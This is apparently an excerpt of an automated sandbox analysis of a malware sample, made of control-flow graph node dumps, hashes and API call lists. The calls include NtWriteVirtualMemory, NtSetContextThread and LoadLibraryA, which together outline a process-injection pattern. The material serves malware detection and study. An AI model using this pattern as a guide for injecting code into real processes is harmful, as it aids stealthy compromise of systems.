550->558 551->523 559 22a2284-22a22f0 551->559 552->553 560 22a1a9c-22a1b0e 552->560 561 22a1c4a-22a1cd0 553->561 562 22a1d64-22a1da8 553->562 554->508 555 22a3332-22a3335 554->555 556->508 564 22a317f-22a31ab call 22a322b NtSetContextThread 556->564 557->550 570 22a20e6-22a216c call 22a23e2 557->570 565 22a201c-22a2084 558->565 566 22a1ff3-22a200a 558->566 576 22a22f5-22a230e 559->576 577 22a1b0f-22a1b3f 560->577 561->562 571 22a1cd6-22a1d61 561->571 562->529 567 22a1dae-22a1dec call 22a23e2 562->567 586 22a31b0-22a31b8 564->586 565->557 566->347 573 22a2010-22a201a 566->573 567->479 571->562 573->565 581 22a2088-22a20a6 573->581 582 22a237b-22a23ae 576->582 583 22a2310-22a237a 576->583 577->577 584 22a1b41-22a1bdb 577->584 581->557 582->576 589 22a23b4 582->589 583->582 584->577 593 22a1be1-22a1c20 584->593 586->586 591 22a31ba-22a31c6 586->591 589->524 591->508 593->577 594 22a1c26-22a1c2a 593->594 594->553
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ";Jm$H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 0-2571250244
                                                                                                                          • Opcode ID: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
                                                                                                                          • Instruction ID: d0f6face05315e375920b6352cfc450eb35e99dbcea15917051ecd2ba327a6ae
                                                                                                                          • Opcode Fuzzy Hash: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
                                                                                                                          • Instruction Fuzzy Hash: CEA2647161434A9FDF349E788DA53DE7BA2FF55350F55822ECC8A8B648D3348986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 1029625771-1197094480
                                                                                                                          • Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction ID: d1ec68e43a0ce40026b042203d79788ef3b04a492b6a0fcad3c61eb422999de0
                                                                                                                          • Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
                                                                                                                          • Instruction Fuzzy Hash: 73C2687161434A9FDF349E78CDA57EE37A2EF55390F95412ECC8A8B648D3348986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 916 22a322b-22a3231 917 229a574-229a80f call 22a1490 call 229a760 916->917 918 22a3237-22a3269 916->918 933 229f3ee-229f4b1 917->933 934 229a815-229a841 917->934 920 22a326f-22a32f4 918->920 921 22a31cc-22a3222 918->921 920->921 926 22a32fa-22a332c 920->926 921->916 926->921 927 22a3332-22a3335 926->927 938 229f4b3-229f4e1 call 229fcc1 call 229f542 933->938 939 229f4e4-229f4e9 LoadLibraryA 933->939 936 2291320-229136d call 22910c0 934->936 937 229a847-229a8fa 934->937 943 22a374d-22a3755 937->943 944 229a900-229aac7 call 229f3ca call 22a2acd 937->944 938->939 945 229f533-229f53d call 229f542 939->945 950 22a3756-22a378f 943->950 962 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 944->962 963 229bbfe-229bd48 call 22a2acd * 3 944->963 950->950 954 22a3791-22a37e0 950->954 962->963 990 229afdf-229b089 962->990 963->933 990->933 992 229b08f-229b1e5 call 22a2acd 990->992 992->936 997 229b1eb-229b20b 992->997 997->963 998 229b211-229b3f2 call 229b2fb 997->998 1004 229b3f8-229b554 call 22a2acd 998->1004 1005 229138e-2291464 call 22a37e8 998->1005 1004->963 1014 229b55a-229b597 1004->1014 1015 22914dd-2291502 1005->1015 1016 2291466-22a2adc 1005->1016 1014->963 1017 229b59d-229b604 1014->1017 1018 2291572-2291578 1015->1018 1019 2291517-2291518 1015->1019 1021 22a2add-22a2b37 1016->1021 1026 229b641-229b64a 1017->1026 1027 229b606-229b63b 1017->1027 1022 2291579-2291594 1018->1022 1019->1018 1021->1005 1028 22a2b3d-22a2d65 1021->1028 1022->1019 1025 2291596-22915a6 1022->1025 1029 22915a9-22915b4 1025->1029 1030 22915b6-22915b9 1025->1030 1026->917 1031 229b650-229b66e 1026->1031 1027->963 1027->1026 1028->1021 1053 22a2d6b-22a2de9 call 22a06a2 1028->1053 1029->1030 1030->1022 1033 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1030->1033 1031->963 1034 229b674-229b68f 1031->1034 1071 22a15ff-22a16a1 1033->1071 1072 22a1df1-22a1e3a 1033->1072 1034->917 1035 229b695-229b815 1034->1035 1043 229b85f-229b884 call 229f944 1035->1043 1049 229b889-229b8b7 1043->1049 1049->963 1052 229b8bd-229b93e call 22a374d 1049->1052 1062 229b943-229b99b NtWriteVirtualMemory 1052->1062 1066 22a2dec-22a2dff 1053->1066 1065 229b9e1-229b9ea 1062->1065 1065->963 1068 229b9f0-229baba call 22a2acd 1065->1068 1066->1066 1069 22a2e01-22a2e89 1066->1069 1068->963 1083 229bac0-229bb82 call 22a2acd 1068->1083 1074 22a2e8c-22a2f06 1069->1074 1071->1005 1079 22a16a7-22a1838 1071->1079 1081 22a2f08-22a2fe7 call 22a322b 1074->1081 1092 22a183c-22a184d 1079->1092 1081->921 1101 22a2fed-22a3091 1081->1101 1083->963 1093 229bb84-229bbde 1083->1093 1094 22a1853-22a1863 1092->1094 1095 22a1e40-22a1e54 1092->1095 1093->943 1100 229bbe4-229bbfd call 22a2acd 1093->1100 1094->1092 1099 22a1865-22a1892 1094->1099 1098 22a1e58-22a1e6d 1095->1098 1102 22a2172-22a2187 1098->1102 1103 22a1e73-22a1eac 1098->1103 1099->1092 1104 22a1894-22a18aa 1099->1104 1101->921 1111 22a3097-22a30ad 1101->1111 1102->1005 1109 22a218d-22a218e 1102->1109 1103->1098 1107 22a1eae-22a1ec5 1103->1107 1104->1092 1108 22a18ac-22a1920 1104->1108 1107->1098 1112 22a1ec7-22a1f29 1107->1112 1119 22a1922-22a199c 1108->1119 1114 22a2192-22a21a1 1109->1114 1111->921 1117 22a30b3-22a30ca 1111->1117 1112->1098 1124 22a1f2f-22a1f46 1112->1124 1115 22a23b6-22a23dd call 22a23e2 1114->1115 1116 22a21a7-22a2219 1114->1116 1116->1005 1127 22a221f-22a222a 1116->1127 1117->921 1123 22a30d0-22a3102 1117->1123 1125 22a1a39-22a1a4c 1119->1125 1126 22a19a2-22a19e7 1119->1126 1123->921 1135 22a3108-22a3161 1123->1135 1124->1005 1130 22a1f4c-22a1fb8 1124->1130 1132 22a1a69-22a1a79 1125->1132 1133 22a1a4e-22a1a68 1125->1133 1126->1132 1127->1114 1134 22a2230-22a2244 1127->1134 1137 22a1fbd-22a1fd1 1130->1137 1139 22a1a7f-22a1a96 1132->1139 1140 22a1c2d-22a1c44 1132->1140 1133->1132 1134->1114 1138 22a224a-22a227e 1134->1138 1135->921 1141 22a3163-22a317d 1135->1141 1142 22a20a7-22a20e0 1137->1142 1143 22a1fd7-22a1ff1 1137->1143 1138->1114 1144 22a2284-22a22f0 1138->1144 1139->1140 1145 22a1a9c-22a1b0e 1139->1145 1146 22a1c4a-22a1cd0 1140->1146 1147 22a1d64-22a1da8 1140->1147 1141->921 1149 22a317f-22a318b call 22a322b 1141->1149 1142->1137 1155 22a20e6-22a216c call 22a23e2 1142->1155 1150 22a201c-22a2084 1143->1150 1151 22a1ff3-22a200a 1143->1151 1161 22a22f5-22a230e 1144->1161 1162 22a1b0f-22a1b3f 1145->1162 1146->1147 1156 22a1cd6-22a1d61 1146->1156 1147->1119 1152 22a1dae-22a1dec call 22a23e2 1147->1152 1165 22a3190-22a31ab NtSetContextThread 1149->1165 1150->1142 1151->936 1158 22a2010-22a201a 1151->1158 1152->1072 1156->1147 1158->1150 1166 22a2088-22a20a6 1158->1166 1167 22a237b-22a23ae 1161->1167 1168 22a2310-22a237a 1161->1168 1162->1162 1169 22a1b41-22a1bdb 1162->1169 1171 22a31b0-22a31b8 1165->1171 1166->1142 1167->1161 1174 22a23b4 1167->1174 1168->1167 1169->1162 1178 22a1be1-22a1c20 1169->1178 1171->1171 1176 22a31ba-22a31c6 1171->1176 1174->1115 1176->921 1178->1162 1179 22a1c26-22a1c2a 1178->1179 1179->1140
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H+m$U=b$}#c
                                                                                                                          • API String ID: 0-2772983987
                                                                                                                          • Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction ID: 106f6bca14348da9a695ba0758586648d3b52b6ca7768ea5abd02df1b0e4bee4
                                                                                                                          • Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
                                                                                                                          • Instruction Fuzzy Hash: FD82437161434ADFDF349E78CDA53EE3BA2EF55390F958229CC8A8B258D3748585CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1180 22a2ad2-22a2adc 1181 22a2add-22a2b37 1180->1181 1183 229138e-2291464 call 22a37e8 1181->1183 1184 22a2b3d-22a2d65 1181->1184 1194 22914dd-2291502 1183->1194 1195 2291466-2291497 1183->1195 1184->1181 1202 22a2d6b-22a2de9 call 22a06a2 1184->1202 1197 2291572-2291578 1194->1197 1198 2291517-2291518 1194->1198 1195->1180 1199 2291579-2291594 1197->1199 1198->1197 1199->1198 1201 2291596-22915a6 1199->1201 1203 22915a9-22915b4 1201->1203 1204 22915b6-22915b9 1201->1204 1210 22a2dec-22a2dff 1202->1210 1203->1204 1204->1199 1206 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1204->1206 1230 22a15ff-22a16a1 1206->1230 1231 22a1df1-22a1e3a 1206->1231 1210->1210 1212 22a2e01-22a2e89 1210->1212 1215 22a2e8c-22a2f06 1212->1215 1219 22a2f08-22a2fe7 call 22a322b 1215->1219 1232 22a31cc-22a3231 1219->1232 1233 22a2fed-22a3091 1219->1233 1230->1183 1238 22a16a7-22a1838 1230->1238 1244 229a574-229a80f call 22a1490 call 229a760 1232->1244 1245 22a3237-22a3269 1232->1245 1233->1232 1239 22a3097-22a30ad 1233->1239 1252 22a183c-22a184d 1238->1252 1239->1232 1242 22a30b3-22a30ca 1239->1242 1242->1232 1246 22a30d0-22a3102 1242->1246 1289 229f3ee-229f4b1 1244->1289 1290 229a815-229a841 1244->1290 1245->1232 1249 22a326f-22a32f4 1245->1249 1246->1232 1254 22a3108-22a3161 1246->1254 1249->1232 1259 22a32fa-22a332c 1249->1259 1257 22a1853-22a1863 1252->1257 1258 22a1e40-22a1e54 1252->1258 1254->1232 1261 22a3163-22a317d 1254->1261 1257->1252 1264 22a1865-22a1892 1257->1264 1263 22a1e58-22a1e6d 1258->1263 1259->1232 1260 22a3332-22a3335 1259->1260 1261->1232 1265 22a317f-22a31ab call 22a322b NtSetContextThread 1261->1265 1267 22a2172-22a2187 1263->1267 1268 22a1e73-22a1eac 1263->1268 1264->1252 1269 22a1894-22a18aa 1264->1269 1282 22a31b0-22a31b8 1265->1282 1267->1183 1274 22a218d-22a218e 1267->1274 1268->1263 1272 22a1eae-22a1ec5 1268->1272 1269->1252 1273 22a18ac-22a1920 1269->1273 1272->1263 1277 22a1ec7-22a1f29 1272->1277 1285 22a1922-22a199c 1273->1285 1279 22a2192-22a21a1 1274->1279 1277->1263 1292 22a1f2f-22a1f46 1277->1292 1280 22a23b6-22a23dd call 22a23e2 1279->1280 1281 22a21a7-22a2219 1279->1281 1281->1183 1295 22a221f-22a222a 1281->1295 1282->1282 1288 22a31ba-22a31c6 1282->1288 1293 22a1a39-22a1a4c 1285->1293 1294 22a19a2-22a19e7 1285->1294 1288->1232 1305 229f4b3-229f4e1 call 229fcc1 call 229f542 1289->1305 1306 229f4e4-229f53d LoadLibraryA call 229f542 1289->1306 1297 2291320-229136d call 22910c0 1290->1297 1298 229a847-229a8fa 1290->1298 1292->1183 1300 22a1f4c-22a1fb8 1292->1300 1302 22a1a69-22a1a79 1293->1302 1303 22a1a4e-22a1a68 1293->1303 1294->1302 1295->1279 1304 22a2230-22a2244 1295->1304 1314 22a374d-22a3755 1298->1314 1315 229a900-229aac7 call 229f3ca call 22a2acd 1298->1315 1309 22a1fbd-22a1fd1 1300->1309 1311 22a1a7f-22a1a96 1302->1311 1312 22a1c2d-22a1c44 1302->1312 1303->1302 1304->1279 1310 22a224a-22a227e 1304->1310 1305->1306 1320 22a20a7-22a20e0 1309->1320 1321 22a1fd7-22a1ff1 1309->1321 1310->1279 1322 22a2284-22a22f0 1310->1322 1311->1312 1323 22a1a9c-22a1b0e 1311->1323 1327 22a1c4a-22a1cd0 1312->1327 1328 22a1d64-22a1da8 1312->1328 1325 22a3756-22a378f 1314->1325 1364 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 1315->1364 1365 229bbfe-229bd48 call 22a2acd * 3 1315->1365 1320->1309 1336 22a20e6-22a216c call 22a23e2 1320->1336 1331 22a201c-22a2084 1321->1331 1332 22a1ff3-22a200a 1321->1332 1345 22a22f5-22a230e 1322->1345 1346 22a1b0f-22a1b3f 1323->1346 1325->1325 1338 22a3791-22a37e0 1325->1338 1327->1328 1341 22a1cd6-22a1d61 1327->1341 1328->1285 1333 22a1dae-22a1dec call 22a23e2 1328->1333 1331->1320 1332->1297 1342 22a2010-22a201a 1332->1342 1333->1231 1341->1328 1342->1331 1352 22a2088-22a20a6 1342->1352 1353 22a237b-22a23ae 1345->1353 1354 22a2310-22a237a 1345->1354 1346->1346 1355 22a1b41-22a1bdb 1346->1355 1352->1320 1353->1345 1360 22a23b4 1353->1360 1354->1353 1355->1346 1366 22a1be1-22a1c20 1355->1366 1360->1280 1364->1365 1394 229afdf-229b089 1364->1394 1365->1289 1366->1346 1369 22a1c26-22a1c2a 1366->1369 1369->1312 1394->1289 1396 229b08f-229b1e5 call 22a2acd 1394->1396 1396->1297 1401 229b1eb-229b20b 1396->1401 1401->1365 1402 229b211-229b3f2 call 229b2fb 1401->1402 1402->1183 1408 229b3f8-229b554 call 22a2acd 1402->1408 1408->1365 1413 229b55a-229b597 1408->1413 1413->1365 1414 229b59d-229b604 1413->1414 1416 229b641-229b64a 1414->1416 1417 229b606-229b63b 1414->1417 1416->1244 1418 229b650-229b66e 1416->1418 1417->1365 1417->1416 1418->1365 1419 229b674-229b68f 1418->1419 1419->1244 1420 229b695-229b8b7 call 229f944 1419->1420 1420->1365 1426 229b8bd-229b9ea call 22a374d NtWriteVirtualMemory 1420->1426 1426->1365 1431 229b9f0-229baba call 22a2acd 1426->1431 1431->1365 1435 229bac0-229bb82 call 22a2acd 1431->1435 1435->1365 1439 229bb84-229bbde 1435->1439 1439->1314 1441 229bbe4-229bbfd call 22a2acd 1439->1441
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: );J$EK]
                                                                                                                          • API String ID: 0-1158390361
                                                                                                                          • Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction ID: 8aef15a0f8dccc1228480d4f0edce6af3f790094f83c71f7a487d3ca2a9f4d95
                                                                                                                          • Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction Fuzzy Hash: CFB15930A14349CFDF38DEB4C9B43EA37A2EF55350F59416ACC8A8BA59D7319982CB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1444 229c88b-229c8a0 1445 229cbe8-229cd65 call 229f32f call 229cc7e 1444->1445 1446 229c8a6-229c954 1444->1446 1450 229f3ee-229f4b1 1445->1450 1449 229c95a-229ca12 call 229f3ee 1446->1449 1446->1450 1465 229ca18-229cae3 call 229ca93 1449->1465 1466 229a574-229a80f call 22a1490 call 229a760 1449->1466 1457 229f4b3-229f4e1 call 229fcc1 call 229f542 1450->1457 1458 229f4e4-229f4e9 LoadLibraryA 1450->1458 1457->1458 1462 229f533-229f53d call 229f542 1458->1462 1465->1466 1480 229cae9-229cb18 1465->1480 1466->1450 1486 229a815-229a841 1466->1486 1480->1466 1482 229cb1e-229cbe6 NtAllocateVirtualMemory 1480->1482 1482->1445 1487 2291320-229136d call 22910c0 1486->1487 1488 229a847-229a8fa 1486->1488 1491 22a374d-22a3755 1488->1491 1492 229a900-229aac7 call 229f3ca call 22a2acd 1488->1492 1495 22a3756-22a378f 1491->1495 1504 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 1492->1504 1505 229bbfe-229bd48 call 22a2acd * 3 1492->1505 1495->1495 1497 22a3791-22a37e0 1495->1497 1504->1505 1532 229afdf-229b089 1504->1532 1505->1450 1532->1450 1534 229b08f-229b1e5 call 22a2acd 1532->1534 1534->1487 1539 229b1eb-229b20b 1534->1539 1539->1505 1540 229b211-229b3f2 call 229b2fb 1539->1540 1546 229b3f8-229b554 call 22a2acd 1540->1546 1547 229138e-2291464 call 22a37e8 1540->1547 1546->1505 1556 229b55a-229b597 1546->1556 1557 22914dd-2291502 1547->1557 1558 2291466-22a2adc 1547->1558 1556->1505 1559 229b59d-229b604 1556->1559 1560 2291572-2291578 1557->1560 1561 2291517-2291518 1557->1561 1563 22a2add-22a2b37 1558->1563 1568 229b641-229b64a 1559->1568 1569 229b606-229b63b 1559->1569 1564 2291579-2291594 1560->1564 1561->1560 1563->1547 1570 22a2b3d-22a2d65 1563->1570 1564->1561 1567 2291596-22915a6 1564->1567 1571 22915a9-22915b4 1567->1571 1572 22915b6-22915b9 1567->1572 1568->1466 1573 229b650-229b66e 1568->1573 1569->1505 1569->1568 1570->1563 1595 22a2d6b-22a2de9 call 22a06a2 1570->1595 1571->1572 1572->1564 1575 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1572->1575 1573->1505 1576 229b674-229b68f 1573->1576 1613 22a15ff-22a16a1 1575->1613 1614 22a1df1-22a1e3a 1575->1614 1576->1466 1577 229b695-229b8b7 call 229f944 1576->1577 1577->1505 1594 229b8bd-229b99b call 22a374d NtWriteVirtualMemory 1577->1594 1607 229b9e1-229b9ea 1594->1607 1608 22a2dec-22a2dff 1595->1608 1607->1505 1610 229b9f0-229baba call 22a2acd 1607->1610 1608->1608 1611 22a2e01-22a2e89 1608->1611 1610->1505 1625 229bac0-229bb82 call 22a2acd 1610->1625 1616 22a2e8c-22a2f06 1611->1616 1613->1547 1621 22a16a7-22a1838 1613->1621 1623 22a2f08-22a2fe7 call 22a322b 1616->1623 1634 22a183c-22a184d 1621->1634 1643 22a31cc-22a3231 1623->1643 1644 22a2fed-22a3091 1623->1644 1625->1505 1635 229bb84-229bbde 1625->1635 1636 22a1853-22a1863 1634->1636 1637 22a1e40-22a1e54 1634->1637 1635->1491 1642 229bbe4-229bbfd call 22a2acd 1635->1642 1636->1634 1641 22a1865-22a1892 1636->1641 1640 22a1e58-22a1e6d 1637->1640 1645 22a2172-22a2187 1640->1645 1646 22a1e73-22a1eac 1640->1646 1641->1634 1647 22a1894-22a18aa 1641->1647 1643->1466 1667 22a3237-22a3269 1643->1667 1644->1643 1655 22a3097-22a30ad 1644->1655 1645->1547 1653 22a218d-22a218e 1645->1653 1646->1640 1651 22a1eae-22a1ec5 1646->1651 1647->1634 1652 22a18ac-22a1920 1647->1652 1651->1640 1656 22a1ec7-22a1f29 1651->1656 1664 22a1922-22a199c 1652->1664 1658 22a2192-22a21a1 1653->1658 1655->1643 1662 22a30b3-22a30ca 1655->1662 1656->1640 1670 22a1f2f-22a1f46 1656->1670 1659 22a23b6-22a23dd call 22a23e2 1658->1659 1660 22a21a7-22a2219 1658->1660 1660->1547 1673 22a221f-22a222a 1660->1673 1662->1643 1669 22a30d0-22a3102 1662->1669 1671 22a1a39-22a1a4c 1664->1671 1672 22a19a2-22a19e7 1664->1672 1667->1643 1674 22a326f-22a32f4 1667->1674 1669->1643 1683 22a3108-22a3161 1669->1683 1670->1547 1677 22a1f4c-22a1fb8 1670->1677 1679 22a1a69-22a1a79 1671->1679 1680 22a1a4e-22a1a68 1671->1680 1672->1679 1673->1658 1681 22a2230-22a2244 1673->1681 1674->1643 1689 22a32fa-22a332c 1674->1689 1685 22a1fbd-22a1fd1 1677->1685 1687 22a1a7f-22a1a96 1679->1687 1688 22a1c2d-22a1c44 1679->1688 1680->1679 1681->1658 1686 22a224a-22a227e 1681->1686 1683->1643 1691 22a3163-22a317d 1683->1691 1692 22a20a7-22a20e0 1685->1692 1693 22a1fd7-22a1ff1 1685->1693 1686->1658 1694 22a2284-22a22f0 1686->1694 1687->1688 1695 22a1a9c-22a1b0e 1687->1695 1696 22a1c4a-22a1cd0 1688->1696 1697 22a1d64-22a1da8 1688->1697 1689->1643 1690 22a3332-22a3335 1689->1690 1691->1643 1699 22a317f-22a31ab call 22a322b NtSetContextThread 1691->1699 1692->1685 1705 22a20e6-22a216c call 22a23e2 1692->1705 1700 22a201c-22a2084 1693->1700 1701 22a1ff3-22a200a 1693->1701 1711 22a22f5-22a230e 1694->1711 1712 22a1b0f-22a1b3f 1695->1712 1696->1697 1706 22a1cd6-22a1d61 1696->1706 1697->1664 1702 22a1dae-22a1dec call 22a23e2 1697->1702 1721 22a31b0-22a31b8 1699->1721 1700->1692 1701->1487 1708 22a2010-22a201a 1701->1708 1702->1614 1706->1697 1708->1700 1716 22a2088-22a20a6 1708->1716 1717 22a237b-22a23ae 1711->1717 1718 22a2310-22a237a 1711->1718 1712->1712 1719 22a1b41-22a1bdb 1712->1719 1716->1692 1717->1711 1724 22a23b4 1717->1724 1718->1717 1719->1712 1728 22a1be1-22a1c20 1719->1728 1721->1721 1726 22a31ba-22a31c6 1721->1726 1724->1659 1726->1643 1728->1712 1729 22a1c26-22a1c2a 1728->1729 1729->1688
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0229CBC8
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                          • String ID: U=b
                                                                                                                          • API String ID: 2616484454-117013522
                                                                                                                          • Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction ID: 227d880e3932897dbe3dc2e449eaca24259683177a30928425fb41250dadf468
                                                                                                                          • Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction Fuzzy Hash: BC816D71A1035BDFCF349EA89DA43EA36B3EF99390F94013ADC499B258D7358A41CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1730 22a1161-22a117b 1731 22a1181-22a11be 1730->1731 1731->1731 1732 22a11c0-22a1213 1731->1732 1734 22a1219-22a1275 1732->1734 1735 229138e-2291464 call 22a37e8 1732->1735 1734->1735 1739 22a127b-22a12ad 1734->1739 1746 22914dd-2291502 1735->1746 1747 2291466-22a2adc 1735->1747 1741 229f3ee-229f4b1 1739->1741 1742 22a12b3-22a1330 1739->1742 1748 229f4b3-229f4e1 call 229fcc1 call 229f542 1741->1748 1749 229f4e4-229f53d LoadLibraryA call 229f542 1741->1749 1750 2291572-2291578 1746->1750 1751 2291517-2291518 1746->1751 1754 22a2add-22a2b37 1747->1754 1748->1749 1755 2291579-2291594 1750->1755 1751->1750 1754->1735 1763 22a2b3d-22a2d65 1754->1763 1755->1751 1760 2291596-22915a6 1755->1760 1764 22915a9-22915b4 1760->1764 1765 22915b6-22915b9 1760->1765 1763->1754 1781 22a2d6b-22a2de9 call 22a06a2 1763->1781 1764->1765 1765->1755 1768 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 1765->1768 1794 22a15ff-22a16a1 1768->1794 1795 22a1df1-22a1e3a 1768->1795 1790 22a2dec-22a2dff 1781->1790 1790->1790 1792 22a2e01-22a2e89 1790->1792 1796 22a2e8c-22a2f06 1792->1796 1794->1735 1800 22a16a7-22a1838 1794->1800 1801 22a2f08-22a2fe7 call 22a322b 1796->1801 1808 22a183c-22a184d 1800->1808 1814 22a31cc-22a3231 1801->1814 1815 22a2fed-22a3091 1801->1815 1809 22a1853-22a1863 1808->1809 1810 22a1e40-22a1e54 1808->1810 1809->1808 1813 22a1865-22a1892 1809->1813 1812 22a1e58-22a1e6d 1810->1812 1816 22a2172-22a2187 1812->1816 1817 22a1e73-22a1eac 1812->1817 1813->1808 1818 22a1894-22a18aa 1813->1818 1836 229a574-229a80f call 22a1490 call 229a760 1814->1836 1837 22a3237-22a3269 1814->1837 1815->1814 1824 22a3097-22a30ad 1815->1824 1816->1735 1823 22a218d-22a218e 1816->1823 1817->1812 1821 22a1eae-22a1ec5 1817->1821 1818->1808 1822 22a18ac-22a1920 1818->1822 1821->1812 1825 22a1ec7-22a1f29 1821->1825 1833 22a1922-22a199c 1822->1833 1827 22a2192-22a21a1 1823->1827 1824->1814 1831 22a30b3-22a30ca 1824->1831 1825->1812 1840 22a1f2f-22a1f46 1825->1840 1828 22a23b6-22a23dd call 22a23e2 1827->1828 1829 22a21a7-22a2219 1827->1829 1829->1735 1843 22a221f-22a222a 1829->1843 1831->1814 1839 22a30d0-22a3102 1831->1839 1841 22a1a39-22a1a4c 1833->1841 1842 22a19a2-22a19e7 1833->1842 1836->1741 1909 229a815-229a841 1836->1909 1837->1814 1845 22a326f-22a32f4 1837->1845 1839->1814 1855 22a3108-22a3161 1839->1855 1840->1735 1848 22a1f4c-22a1fb8 1840->1848 1850 22a1a69-22a1a79 1841->1850 1851 22a1a4e-22a1a68 1841->1851 1842->1850 1843->1827 1852 22a2230-22a2244 1843->1852 1845->1814 1862 22a32fa-22a332c 1845->1862 1857 22a1fbd-22a1fd1 1848->1857 1860 22a1a7f-22a1a96 1850->1860 1861 22a1c2d-22a1c44 1850->1861 1851->1850 1852->1827 1858 22a224a-22a227e 1852->1858 1855->1814 1864 22a3163-22a317d 1855->1864 1865 22a20a7-22a20e0 1857->1865 1866 22a1fd7-22a1ff1 1857->1866 1858->1827 1867 22a2284-22a22f0 1858->1867 1860->1861 1869 22a1a9c-22a1b0e 1860->1869 1870 22a1c4a-22a1cd0 1861->1870 1871 22a1d64-22a1da8 1861->1871 1862->1814 1863 22a3332-22a3335 1862->1863 1864->1814 1873 22a317f-22a31ab call 22a322b NtSetContextThread 1864->1873 1865->1857 1880 22a20e6-22a216c call 22a23e2 1865->1880 1874 22a201c-22a2084 1866->1874 1875 22a1ff3-22a200a 1866->1875 1887 22a22f5-22a230e 1867->1887 1889 22a1b0f-22a1b3f 1869->1889 1870->1871 1881 22a1cd6-22a1d61 1870->1881 1871->1833 1876 22a1dae-22a1dec call 22a23e2 1871->1876 1900 22a31b0-22a31b8 1873->1900 1874->1865 1883 2291320-229136d call 22910c0 1875->1883 1884 22a2010-22a201a 1875->1884 1876->1795 1881->1871 1884->1874 1893 22a2088-22a20a6 1884->1893 1894 22a237b-22a23ae 1887->1894 1895 22a2310-22a237a 1887->1895 1889->1889 1897 22a1b41-22a1bdb 1889->1897 1893->1865 1894->1887 1904 22a23b4 1894->1904 